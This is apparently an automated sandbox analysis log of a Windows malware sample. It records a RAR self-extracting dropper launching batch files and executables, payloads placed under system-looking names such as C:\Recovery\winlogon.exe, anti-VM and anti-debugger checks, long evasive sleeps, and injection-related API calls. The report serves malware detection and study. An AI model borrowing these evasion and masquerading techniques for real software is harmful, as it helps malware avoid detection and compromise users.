                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Recovery\winlogon.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Memory allocated: 12C0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Memory allocated: 1B050000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | Memory allocated: DD0000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | Memory allocated: 1A960000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | Memory allocated: C80000 memory reserve | memory write watch
                                Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | Memory allocated: 1A6E0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Memory allocated: 1070000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Memory allocated: 1ADE0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Memory allocated: 1190000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Memory allocated: 1AB50000 memory reserve | memory write watch
                                Source: C:\Recovery\winlogon.exe | Memory allocated: FE0000 memory reserve | memory write watch
                                Source: C:\Recovery\winlogon.exe | Memory allocated: 1AFB0000 memory reserve | memory write watch
                                Source: C:\Recovery\winlogon.exe | Memory allocated: E50000 memory reserve | memory write watch
                                Source: C:\Recovery\winlogon.exe | Memory allocated: 1A910000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Memory allocated: EB0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Memory allocated: 1A8C0000 memory reserve | memory write watch
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe | Memory allocated: 1480000 memory reserve | memory write watch
                                Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe | Memory allocated: 1B0E0000 memory reserve | memory write watch
                                Source: C:\Recovery\winlogon.exe | Memory allocated: 21E0000 memory reserve | memory write watch
                                Source: C:\Recovery\winlogon.exe | Memory allocated: 1A3C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 599563
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 599452
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 599331
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 597297
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 597175
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Window / User API: threadDelayed 3628
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Window / User API: threadDelayed 2325
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\tnEMlbYs.log
Source: C:\Recovery\winlogon.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\aEtIhTbg.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\vybNluDs.log
Source: C:\Recovery\winlogon.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\WslZMRrk.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\MFrsFgjH.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\lKwWBiIK.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\TDfrhvdw.log
Source: C:\Recovery\winlogon.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\LdxTVLQK.log
Source: C:\Recovery\winlogon.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\tRVOBpwv.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\RAtJMMZA.log
Source: C:\Recovery\winlogon.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\rGzNBWQu.log
Source: C:\Recovery\winlogon.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\BudDliLc.log
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Evasive API call chain: GetLocalTime,DecisionNodes | graph_3-24194
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_3-25436
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_0-25448
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -599563s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -599452s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -599331s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -99859s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -99750s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -99640s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -99531s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -99312s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -99203s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -99094s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -98875s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -98765s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -98656s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -98547s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -98437s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -98328s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -98219s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -98109s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -597297s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7308 | Thread sleep time: -597175s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7188 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7804 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe TID: 7976 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe TID: 8012 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7564 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 2004 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\winlogon.exe TID: 7660 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\winlogon.exe TID: 7640 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe TID: 7988 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe TID: 1732 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\winlogon.exe TID: 8052 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\winlogon.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\winlogon.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\winlogon.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError | 0_2_00A2BA94
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW | 0_2_00A3D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_0031BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError | 3_2_0031BA94
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_0032D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW | 3_2_0032D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0072A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError | 4_2_0072A69B
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0073C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW | 4_2_0073C220
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A3F82F VirtualQuery,GetSystemInfo | 0_2_00A3F82F
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 599563
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 599452
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 599331
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 99859
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 99750
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 99640
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 99531
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 99422
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 99312
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 99203
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 99094
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 98984
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 98875
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 98765
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 98656
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 98547
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 98437
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 98328
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 98219
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 98109
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 597297
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 597175
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe | Thread delayed: delay time: 922337203685477
Source: C:\Recovery\winlogon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | File opened: C:\Users\user\AppData\Local
Source: work.exe, 00000003.00000003.1630533570.0000000002D5C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y.,
Source: dwartg.exe, 00000004.00000003.1628390760.0000000002E82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: dwartg.exe, 00000004.00000003.1628390760.0000000002E82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SurrogatewebSession.exe, 00000008.00000002.1740551544.000000001C098000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: work.exe, 00000003.00000003.1630533570.0000000002D5C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: work.exe, 00000003.00000002.1631802705.0000000002CCB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _VMware_SATA_CD00#4&224f42ef&0&0@
Source: wscript.exe, 00000005.00000002.1664665110.0000000002D6B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef
Source: SurrogatewebSession.exe, 00000008.00000002.1740585685.000000001C0B9000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000027.00000002.1785246422.000001FA32E09000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | API call chain: ExitProcess graph end node | graph_0-24539
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | API call chain: ExitProcess graph end node | graph_3-24395
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | API call chain: ExitProcess graph end node | graph_4-24904
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00A40A0A
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A491B0 mov eax, dword ptr fs:[00000030h] | 0_2_00A491B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_003391B0 mov eax, dword ptr fs:[00000030h] | 3_2_003391B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_00747DEE mov eax, dword ptr fs:[00000030h] | 4_2_00747DEE
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A4D1F0 GetProcessHeap | 0_2_00A4D1F0
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Process token adjusted: Debug
Source: C:\Recovery\winlogon.exe | Process token adjusted: Debug
Source: C:\Recovery\winlogon.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00A40A0A
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A40B9D SetUnhandledExceptionFilter | 0_2_00A40B9D
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A40D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_00A40D8A
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Code function: 0_2_00A44FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00A44FEF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_00330A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_00330A0A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_00330B9D SetUnhandledExceptionFilter | 3_2_00330B9D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_00330D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 3_2_00330D8A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Code function: 3_2_00334FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_00334FEF
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0073F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 4_2_0073F838
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0073F9D5 SetUnhandledExceptionFilter | 4_2_0073F9D5
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_0073FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 4_2_0073FBCA
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe | Code function: 4_2_00748EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 4_2_00748EBD
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class73.cs | Reference to suspicious API methods: A86.VirtualProtect(intPtr, (UIntPtr)(ulong)num, A86.OkN.flag_2, out var okN_)
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class74.cs | Reference to suspicious API methods: A86.GetProcAddress(A86.GetModuleHandle(string_0), string_1)
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, AFA.cs | Reference to suspicious API methods: A86.VirtualAlloc(intPtr3, (IntPtr)uint_0, A86.U14.flag_0 | A86.U14.flag_1, A86.OkN.flag_2)
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe"
